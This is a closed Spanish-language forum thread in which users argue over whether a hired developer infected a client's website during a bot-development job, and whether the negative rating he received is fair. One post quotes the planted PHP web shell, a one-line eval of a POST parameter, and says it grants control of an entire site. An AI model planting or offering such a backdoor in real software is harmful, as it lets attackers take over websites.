🔒 Este tema está cerrado para nuevas respuestas.
⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.
exacto pero hay un afectado economicamente y no fusite tú. Si eres el responsable de entregar un mal trabajo y retrasarte. Por tanto a ti no te interesa porque no pierdes nada, mas que claro un -1 en tu "reputacion" aunque ya quedó claro como "trabajas".Es su palabra contra la mía, nadie sabe lo que pasó (ni yo ni él).
exacto pero hay un afectado economicamente y no fusite tú. Si eres el responsable de entregar un mal trabajo y retrasarte. Por tanto a ti no te interesa porque no pierdes nada, mas que claro un -1 en tu "reputacion" aunque ya quedó claro como "trabajas".
No defiendo por conocerlo, te reitero solo participo activaamente porque soy actor de este drama. Tampoco has brindado una sola prueba de no haberlo hecho. Sin embargo el usuario tuvo su web infectada durante 5 dias y el ultimo en ingresar fuiste tú. Acaso vas a poner en duda la palabra de todo el mundo?
codigo:para los que no lo sepan dicho codigo permite hacerse con el control de todo un sitio.
<?php @eval($_POST['page3']);?>
[MENTION=29029]SoLuIts[/MENTION] Imagina que yo no se nada sobre programación, ¿me podrías explicar en que beneficiaria ese código al que infecta el sitio?
He leído todo y por ahora estoy a favor de tnc05.
Kanikase lo único que ha dicho es cosas como ¿puedes comprobar que fui yo? apoyas a tnc05 porque lo conoces, ¿porque comentas mas que el afectado?
Eso es falta de seriedad a mi criterio, y es que por lógica uno culpa al primero que ve, o sea kanikase fue el que entro a la web.
Y también leyendo ambos usuarios argumentan que ganan bastante dinero, así que ninguno de los dos podría ganar algo con esto, por parte de kanikase tal vez saldría más beneficiado por que ganaría dinero con la redirección, y ¿el otro usuario que ganaría? ¿solo fastidiar al otro? así yo lo veo.
Ahora la solución que creo seria lo ideal para que ambos usuarios salgan bien de alguna forma es que kanikase le reembolse a tnc05 y el retire la negativa.
Y quedaría el caso sin resolver, quien pudo infectar la web porque aun faltan pruebas que seria difícil de encontrar.
Saludos
cual era el dominio a que redirecciona??
Foronovela innecesaria. Independientemente si el codigo está malo o no. El usuario kanikase incumple con los tiempos estipulados. :star2:
Perdon que me meta.
pero creo que la calificacion es incorrecta, por una simple y sencilla razon... el negocio era -si no estoy equivocado- trabajar en un bot... el tema de la infeccion de una web... no necesariamente viene de un FTP hay millon maneras de ser infectados, y desafortunadamente no hay manera de comprobar que el "desarrollador" es el responsable...
ahora que honestamente las excusas que el "desarrollador" dio por el retraso YO NO ME LAS CREERIA.
sin embargo creo que la calificación es incorrecta el usuario QUIZAS debio calificar negativo por no cumplir con lo ofrecido MAS NO POR UNA INFECCIÓN DE VIRUS...
quizas no les caiga bien la opinión pero es lo que yo creo
Pero el otro lo aceptó el mismo lo dijo jajaForonovela innecesaria. Independientemente si el codigo está malo o no. El usuario kanikase incumple con los tiempos estipulados. :star2:
🔒 Este tema está cerrado para nuevas respuestas.
⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.
Utilizamos cookies y tecnologías similares para los siguientes fines:
¿Aceptas las cookies y estas tecnologías?
Utilizamos cookies y tecnologías similares para los siguientes fines:
¿Aceptas las cookies y estas tecnologías?